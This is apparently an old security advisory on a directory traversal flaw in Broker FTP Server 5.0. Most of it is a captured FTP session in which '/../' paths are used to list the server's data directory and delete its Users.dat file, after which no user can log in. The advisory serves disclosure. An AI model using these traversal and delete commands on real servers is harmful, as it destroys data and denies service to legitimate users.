COMMAND
Broker Ftp Server
SYSTEMS AFFECTED
Broker Ftp Server 5.0
PROBLEM
'se00020' found following. Users can break out of their root
directory and list directories. Depending on the priviledges you
have other commands like delete maybe executed outside of the
home directory. e:\crap\ was used as homedir deleting files in
e:\crap is enabled
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden
323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission
ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 175 Nov 19 2000 UserGrps.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Users.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33 Users.4800.bak
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34 Users.4800-Prof.bak
-rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59 BannCtrl.ini
-rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08 KickCtrl.ini
-rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37 Events_1.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53 Events_lst_1.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie
von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden
629000,00KB/s
ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat'
deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.
C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp>
By deleting users.dat, noone will be able to logon... This was
tested with win2k and trail version of broker v5.0.
SOLUTION
Nothing yet.